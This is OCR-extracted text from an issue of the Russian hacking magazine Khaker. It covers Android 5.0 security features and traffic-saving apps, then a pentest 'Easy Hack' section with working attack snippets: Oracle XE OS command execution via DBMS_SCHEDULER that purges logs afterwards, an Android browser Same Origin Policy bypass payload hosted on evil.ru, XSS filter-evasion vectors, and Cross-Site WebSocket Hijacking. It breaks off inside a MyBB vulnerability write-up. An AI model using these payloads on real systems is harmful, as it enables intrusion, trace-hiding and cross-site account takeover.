книги хакеры / журнал хакер / 192_Optimized

X-Mobile

Она позволяет запустить чистую ОС рядом с основной и полностью отрезать системы друг от друга, но доступна только в смартфонах и планшетах соответствующей марки.

SMARTLOCK

Пользователи не любят PIN-коды и графические ключи, и Google отлично это понимает. Поэтому еще одним новшеством 5.0 стала функция Smart Lock, позволяющая сохранить безопасность смартфона и данных, не утомляя себя вводом цифр или рисованием на экране сложных иероглифов. Это еще один шаг Google в сторону «защищенного по умолчанию смартфона», о котором мы говорили в разделе про шифрование.

Однако в этот раз все намного про-

ще. Smart Lock — это не что иное, как возможность автоматического отключения защиты экрана блокировки после подключения к од-

ному из Bluetooth-

устройств (умные часы, автомагнитола, TV Box), касания смартфоном NFC-метки или на основе местоположения. Фактически это официальная реализация функций, которые уже несколько лет доступны в сторонних приложениях, прошивках от производителей (мотороловский Trusted Bluetooth, например), Tasker, приложениях для Pebble и других умных часов (приложение

SWApp Link).

Теперь функциональность этих приложений доступна в самой прошивке, а все, что остается сделать юзеру, — это установить на экран блокировки PIN-код или ключ, активировать Smart Lock в настройках безопасности (раздел Trusted Agents) и добавить доверенные Bluetooth-устройства, NFC-теги или места.

Функция разблокировки по снимку лица теперь тоже часть Smart Lock. Причем отныне она не только включается на экране блокировки, но и постоянно следит за юзером и блокирует устройство, если лицо изменилось. Другими словами, стоит вору, выхватившему смартфон из рук владельца, взглянуть на экран, как смартфон сразу заблокируется.

ОБНОВЛЯЕМЫЙWEBVIEW

С первых версий Android включал в себя компонент WebView на базе WebKit, позволяющий сторонним приложениям использовать HTML/JS-движок для отображения контента. На нем же базировалось большинство сторонних браузеров. В KitKat WebView был серьезно модернизирован и заменен на дви-

жок из проекта Chromium (версии 33 в Android 4.4.3),

что позволило разработчикам получить доступ к последним наработкам Google в области отображения веб-контента.

Начиная с Lollipop, WebView не просто базируется на Chromium, но и умеет обновляться через Google Play (в автоматическом режиме, незаметно для юзера). Это значит, что независимо от используемой версии Android разработчики приложений теперь всегда будут иметь дело с последней версией HTML/ JS-движка, включающей все последние нововведения. Но что более важно, Google теперь сможет закрывать уязвимости в движке так же быстро, как уязвимо-

сти в Google Chrome для Android. Все, что потребуется от юзера, — это подключенный к интернету смартфон с Android 5.0 или выше.

KILLSWITCH

В августе 2013 года Google запустила веб-сервис

Android Device Manager, с помощью которого мы по-

лучили возможность сброса до заводских настроек или удаленной блокировки смартфона. В качестве клиентской части на смартфоне сервис использовал обновляемый через Google Play компонент Google Services, поэтому функция стала доступна для любых устройств, начиная с Android 2.3.

Начиная с Android 5.0, сервис также включает в себя функцию Factory Reset Protection. После ее активации возможность сброса до заводских настроек будет заблокирована паролем, что, по мнению Google, будет препятствовать полноценному использованию смартфона или его продаже.

Ведь однажды привязанный к аккаунту Google смартфон уже не может быть отвязан без сброса настроек.

чем серьезный метод борьбы с кражами. В конце концов, разблокировка загрузчика и права root решат все вопросы возвращения смартфона к заводскому состоянию.

ДРУГИЕУЛУЧШЕНИЯ

•Интеграция с ChromeOS. Братская ОС уже научилась получать уведомления от Android и запускать Android-приложения, а теперь она умеет автоматически впускать юзера, если рядом находится его телефон (этакий Smart Lock наоборот).

•Улучшения в поддержке HTTPS и TLS/SSL.

В Android 5.0 теперь включена поддержка TLSv1.1 и TLSv1.2. При согласовании ключей по возможности используется опция Forward Secrecy. Добавлена поддержка алгоритма AES-GCM, а ущербные в плане безопасности алгоритмы шифрования/ хеширования (MD5, 3DES) отключены.

•PIE везде. Android теперь явно требует, чтобы все нативные бинарники были скомпилированы с под-

держкой PIE (Position-Independent Executables).

•Расширенная поддержка FORTIFY_SOURCE. Такие функции, как stpcpy(), stpncpy(), read(), recvfrom(), FD_CLR(), FD_SET() и FD_ISSET(), теперь также за-

щищены с помощью механизма FORTIFY_SOURCE компилятора GCC (защита от срыва стека). Начальная поддержка FORTIFY_SOURCE появилась еще в Android 4.2.

ВМЕСТОВЫВОДОВ

Google не только сделала Android 5.0 таким, каким его хотят видеть пользователи и производители смартфонов, но и приложила все усилия для того, чтобы решить две основные проблемы безопасности: уберечь смартфон от посторонних глаз и защитить от уязвимости к атакам, направленным на получение прав root. Эффективны ли эти улучшения, покажет время, но уже сейчас можно точно сказать, что Lollipop — это самая защищенная версия Android из всех.

X-Mobile

ONAVOEXTEND

Начиная с версии 4.0, Android включает в себя полноценную поддержку VPN. Кроме обхода Роскомнадзора и создания частных сетей, ее вполне можно использовать для экономии трафика. Onavo Extend представляет собой VPNпрокси, который сжимает все запрошенные смартфоном данные на удаленном сервере, а затем распаковывает их на устройстве.

Приложение также выступает в качестве кеширующего HTTPпрокси, который сохраняет посещаемые страницы на карте памяти, так что при повторном открытии веб-страниц трафик не будет расходоваться вовсе. В современном мире повсеместного распространения AJAX и динамики эта функция, конечно, не принесет особой экономии, но это всяко лучше, чем ничего.

Кстати, в маркете есть аналогичный продукт от всем известной

Opera. Это приложение Opera Max,

также доступное для iOS и Android.

Onavo Extend: goo.gl/YYA1j

Платформа: Android/iOS

Цена: бесплатно

AFWALL+

Один из самых эффективных способов сэкономить на трафике — это полностью отрезать доступ к Сети тем приложениям, которые не особо в нем нуждаются, но продолжают использовать. Это может быть софт со встроенной рекламой, софт с функцией обновления или приложения, которые собирают или отправляют разного рода статистику.

В Android нет встроенного брандмауэра, но есть несколько оберток для iptables, которые можно использовать для таких целей. AFWall+ — одна из таких оберток. Все просто: ты выбираешь софт, который сможет (или не сможет) получить доступ в Сеть по Wi-Fi и 3G, и сохраняешь правила. В качестве опции есть возможность загрузки сложных правил в формате iptables.

Недостатки приложения: необходимо получить root и совместимо приложение не со всеми устройствами.

AFWall+: goo.gl/eH7yb

Платформа: Android

Цена: бесплатно / open source

OPERAMINI

Сегодня браузером со встроенной функцией сжатия трафика уже вряд ли кого-то удивишь. Поэтому для многих юзеров существование и развитие древнего, как сами смартфоны, Opera Mini кажется весьма странным явлением. Сжатие уже давно есть в полноценном Opera Mobile, и развивать ущербный в плане функциональности браузер не имеет смысла.

Причина живучести Opera Mini очень проста и заключается в том, что этот браузер использует совсем другой и гораздо более эффективный метод сжатия вебстраниц.

Opera Mini не поддерживает ни HTML, ни JS, ни CSS. Он ото-

бражает страницы в компактном бинарном формате OBML (Opera Binary Markup Language), который получает от одного из серверов Opera после прогонки через конвертер HTML — OBML и выполнения JavaScript на стороне сервера. OBML позволяет сократить потребление трафика до 90%, что гораздо больше стандартных методов компрессии, но превращает все веб-страницы в статические.

Opera Mini: goo.gl/9PoS31

Платформа: Android / iOS / Windows Phone

Цена: бесплатно

ADAWAY

Еще один неочевидный способ сэкономить на трафике — это воспользоваться одной из резалок рекламы. В Android действительно слишком много приложений с навязчивой рекламой, у многих из которых нет платной версии. При регулярном использовании приложения реклама изрядно кушает трафик, поэтому нередко от нее лучше избавиться. Сделать это можно либо с помощью всем известного Adblock, но я бы порекомендовал использовать более простой и менее бажный AdAway.

Преимущество AdAway в том, что он не создает никаких дополнительных абстракций и VPNтуннелей, а просто добавляет «неугодные» адреса в /system/etc/ hosts. Реклама отрезается еще на этапе DNS-резолвинга и вообще не загружается из Сети.

AdAway: goo.gl/2Qacc

Платформа: Android

Цена: бесплатно

!

Если тебе есть что сказать, ты можешь войти в команду любимого журнала.

Hint: контакты редакторов всех рубрик есть на первой полосе.

Взлом

Easy Hack

РЕШЕНИЕ

Вот представь себе, что у нас есть доступ к СУБД по сети (через TNS) либо через SQL-инъекцию с админ-учеткой. И конечно, у нас может возникнуть желание развить нашу атаку, попасть в ОС, закрепиться там и полезть дальше. Самый стандартный способ выполнения команд через Java. Но вот незадача — не всегда работает. Причина в том, что существует урезанная версия Oracle, так называемый Express Edition (XE), которая поставляется без Javа Virtual Machine и еще кое-чего. Что же делать?

Использовать другой способ выполнения команд! Например, через шедулер.

begin

DBMS_SCHEDULER.create_program('any_name','EXECUTABLE',

'echo "any commands with parameters"',0,TRUE);

DBMS_SCHEDULER.create_job(job_name=>'any_job_name',

program_name=>'any_name',

start_date=>NULL,repeat_interval=?

>NULL,end_date=>NULL,enabled=>TRUE,auto_drop=>TRUE);

dbms_lock.sleep(1);

dbms_scheduler.drop_program(program_name=>'any_name');

dbms_scheduler.purge_log;

end;

Я думаю, что смысл здесь ясен из названий команд. Практически последние три не особо нужны. Только чтобы кильнуть команду и почистить лог.

Результат работы запущенной команды не возвращается, но, насколько помню, перенаправление вывода и другие штуки отлично работают.

РЕШЕНИЕ

Несмотря на то что браузеры — это вещь давно привычная и сайты в них выглядят практически одинаково, внутри они отличаются очень значительно. И опять-та- ки, несмотря на то что веб вроде как во многом стандартизирован, если присмотреться, то обнаружится большой ряд неточностей и недоговорок, которые различные вендоры решают по-своему. В итоге все приходит к тому, что каждый из браузеров имеет свою особую специфику. Вот, например, Internet Explorer здесь сильно выделяется, о чем мы не раз говорили в Easy Hack’е и чем мы не раз пользовались для эксплуатации специфичных (браузерозависимых) уязвимостей. Но и в других браузерах специфических и зачастую уязвимых реализаций того или иного функционала предостаточно, так что любому пентестеру желательно знать специфику и остальных браузеров. Приведу несколько примеров.

Недавно вскрылась большая уязвимость в мобильном браузере (это не хром и не ФФ, а отдельный такой браузер) на платформе Android. И не простая уязвимость, а обход Same Origin Policy. Напомню, что SOP — это когда у тебя в браузере JavaScript с одного сайта не может просто получить данные другого сайта. То есть браузер каждый отдельный сайт (точнее, протокол + сайт + порт) воспринимает как отдельную сущность и очень ограничивает возможность доступа к другим таким же сущностям. Когда же есть обход SOP, мы, заманив юзера к нам на сайт (http://evil.ru, например), с нашего сайта можем получить полный доступ к любому другому сайту от имени юзера. Так вот, атака для обхода SOP для андроидобраузера вполне проста:

<iframe name="test" src="http://gmail.com"></iframe>

<input type=button value="test" onclick="window.open

('\u0000javascript:alert(document.domain)','test')" >

Вот такой код мы размещаем на своем http://evil.ru, а в итоге код

(alert(document.domain)) выполнится на Gmail’е. По коду мы здесь созда-

ем iframe с почтосайтом, а дальше в нем же «запускаем» свой яваскрипт (input нужен лишь для тестирования, в реале все происходит автоматом). Все в атаке вполне логично, но браузеры должны такое пресекать (как раз по SOP), а самое главное, что и дефолтный дроидовый браузер это пресек бы. Если бы не «\u0000» — это «null»-байт, заэнкоженный в юникоде. Именно из-за него у браузера не срабатывает проверка и мы имеем крутейшую уязвимость. Причем с учетом того, что уязвимость до версии Android’а 4.4

есть, да и с тем, что обычные люди не патчат свои девайсы, это просто золотая жила.

Пример номер два. Систематически бывает, что вроде можно подпихнуть что-то похожее на XSS’ку, но практически мы сталкиваемся с различными ограничениями. Например, нельзя пробелы подсовывать, потому что они вырезаются, или двойные и одинарные кавычки фильтруются, а они нам нужны. Так вот и здесь для успешной эксплуатации нам надо знать, что пробелы между элементами мы можем заменить на слеш / (например, <svg/onload=alert(1)>), а в IE мы можем использовать вместо кавычек апостроф `. Как видишь, тонкостей много.

Но откуда ж это все узнать? Во-первых, это cheatsheet’ы, то есть готовые методики для типовых проблем (например, от OWASP: goo.gl/Ne8nGI).

Во-вторых, можно пофазить и самому. Не так давно появился очень интересный ресурс Shazzer (goo.gl/z0SrxG). Это онлайн-тулза для фаззинга браузеров. Можно очень по-быстрому накатать необходимый тебе векторок и профазить его. Но более важно то, что векторы и итоги их шарятся между пользователями системы. Это нам дает, во-первых, то, что многие из интересующих нас векторов уже профажены и мы оперативно можем посмотреть итоги, а во-вторых, то, что люди приходят с разными браузерами и, как итог, мы иногда имеем возможность выявить какие-то специфические браузерные штуки.

Конечно, если ты уже давно и глубоко в вебе (особенно браузерном), то, вероятно, имеешь некую свою платформу с блек-джеком и барышнями, но для разовых задач ресурс идейно очень удобен.

Подробнее можно прочитать здесь: goo.gl/urMpHC.

Взлом

Easy Hack

РЕШЕНИЕ

Но вернемся обратно к вебу, точнее к его будущему. В HTML5 появилось множество технологий, в том числе и такая технология, как веб-сокеты.

Веб-сокеты — это такой протокол, который позволяет установить полнодуплексное соединение между браузером и сервером по протоколу TCP. То есть вместо обычного бессессионного HTTP, с его «запрос-ответ», мы имеем обычное TCP-подключение, где любая из сторон может слать данные, и это все в рамках одной TCP-сессии.

Несмотря на невысокую распространенность применения веб-сокетов, все современные браузеры их поддерживают (даже ИЕ).

Далее немного фактов. Веб-сокеты работают на тех же портах, что и сам веб-сервер, HTTPS поддерживает. Они обозначаются схемой «ws://» и «wss://» для защищенного подключения. Данные внутри веб-сокета (после установки подключения) не шифруются, а только маскируются.

Для того чтобы установить подключение, веб-сервер посылает GETзапрос на веб-сервер для инициализации соединения. Основное отличие этого запроса от обычного — дополнительные заголовки (заголовки после

Host):

GET / HTTP/1.1

Host: victim.ru

Origin: http://evil.org

Sec-WebSocket-Key G54JzsUvsF7FWpzopP2HRw==

Sec-WebSocket-Version: 13

Connection: Upgrade

Upgrade: websocket

Последние два указывают браузеру на переход на веб-сокет. Далее версия протокола и случайное значение, для защиты от «поддельных запросов» (хотя не очень понятно, какая там атака может быть). Очень важный заголовок — Origin, указывает, с какого сайта было инициализировано подключение.

Ответ от сервера будет следующим:

HTTP/1.1 101 Web Socket Protocol Handshake

Access-Control-Allow-Credentials: true

Access-Control-Allow-Headers: content-type, x-websocket

-extensions, x-websocket-version, x-websocket-protocol

Access-Control-Allow-Origin: http://victim.ru

Sec-WebSocket-Accept: 5Lw1/qhX7PKx66t9+Rn+bV3x4Jg=?

Upgrade: websocket

Последние два заголовка аналогичны. Далее три заголовка в стиле CORS, которые указывают возможность отсылки кредам дополнительных заголовков, а также с какого домена это разрешено. Но фактически эта троица ни на что не влияет, потому как сразу после получения ответа создается веб-сокет (то есть обычное TCP-подключение), где уже передается текст или данные. Формат пакетов вполне минимален: несколько бит для фрагментации, маски и размера данных в пакете, а далее — данные.

И самый важный момент — веб-сокет изначально спроектирован для межсайтового взаимодействия, а потому SOP фактически на него не действует.

Еще, возможно, интересен вопрос о том, как мы можем узнать (с точки зрения пентестера), поддерживаются ли веб-сокеты в данном конкретном приложении. Но были попробованы различные методы, и единственный вы-

Тулза для тестирования веб-сокетов в составе IronWASP

Трафик от подключения по веб-сокету

явленный вариант — протыкать указанным выше запросом все пути на сайте (так как, например, на запрос к корню сервер вернет нам 404, а на какойнибудь web/char — разрешение на коннект).

О’кей, теперь перейдем к самой атаке на сокеты с таким забавным на-

званием, как Cross-Site WebSocket Hijacking. Она на самом деле проста.

Суть ее в том, что мы с нашего сайта (origin’а) можем создать веб-сокеты с атакуемым веб-приложением от имени юзера (зашедшего на наш сайт). Тут ведь в чем дело: во-первых, инициировать создание веб-сокета к атакуемому веб-приложению мы можем с любого сайта. А во-вторых, при инициализирующем запросе автоматически подставятся куки (или HTTP-аутентификация), так как это обычный GET-запрос, только с дополнительными заголовками. Фактически получается, что это обычная CSRFатака, только на выходе мы имеем веб-сокет, с помощью которого можем общаться с веб-приложением от имени юзера.

Теперь немного о тонкостях. Как ты видел в ответе от сервера, там есть различные заголовки. Например, Access-Control-Allow-Origin, который должен был бы защищать юзера: если его браузер получает в этом поле другой сайт, чем тот, с которого мы инициализируем веб-сокет, то браузер должен веб-сокет не устанавливать. Но, увы, ни на что заголовок не влияет. Получается, что вся ответственность за защиту лежит на самом веб-приложении. Как вариант, оно должно проверять Origin из клиентского запроса и, если он похож на нужный, только тогда разрешать подключение. Тут, правда, есть еще тонкость, что веб-сокеты можно использовать и без браузера, с обычных приложений, но тогда заголовка Origin уже не будет.

Еще одно решение: поскольку CSWSH — подобие CSRF-атаки, то для защиты от нее мы можем использовать аналогичные токены для защиты от нелегального подключения.

Итого, так как методы защиты типичные, то и методы обхода их нам уже знакомы.

Возможно, у тебя возник вопрос: а что нам CSWSH может дать? С одной стороны, ничего универсального. Это не XSS, где мы с JS можем творить чудеса. Несмотря на название, лучше воспринимать это как что-то похожее на CSRF. С другой стороны, если функционал приложения через веб-сокеты велик, то, учитывая возможность и слать запросы, и получать ответы, мы можем сделать очень многое.

И немного о практике. К сожалению, всеми любимый Burp (1.6) умеет лишь снифать передаваемые данные, а отправлять произвольные запросы в веб-сокет не умеет. Зато это умеют делать ZAP и гораздо менее известный продукт — IronWASP (www.ironwasp.org). Для тестирования самой атаки можно воспользоваться и онлайн-сервисом goo.gl/vMiOsu.

Спасибо за внимание и успешных познаний нового!

Борис Рютин, ЦОР dukebarman.pro, b.ryutin@tzor.ru, @dukebarman

Взлом

MYBB 1.8.2

CVSSv2: N/A

Дата релиза: 8 июля 2014 года

Автор: Taoguang Chen, Avinash Kumar Thapa

CVE: N/A

Думаю, бесплатный PHP-движок для создания форумов MyBB знаком многим, плюс мы его освещали на страницах нашего журнала, поэтому перейдем к самому интересному — уязвимостям.

В случае, когда register_globals включены, MyBB будет вызывать функцию unset_globals(), которая будет удалять все глобальные переменные в PHP, пришедшие из массивов $_POST, $_GET, $_FILES и $_ COOKIE:

if(@ini_get("register_globals") == 1)

{

$this->unset_globals($_POST);

$this->unset_globals($_GET);

$this->unset_globals($_FILES);

$this->unset_globals($_COOKIE);

}

...

}

...

function unset_globals($array)

{

if(!is_array($array))

{

return;

}

foreach(array_keys($array) as $key)

{

//Двойное удаление из-за zend_hash_del_key_or_index

в PHP <4.4.3 и <5.1.4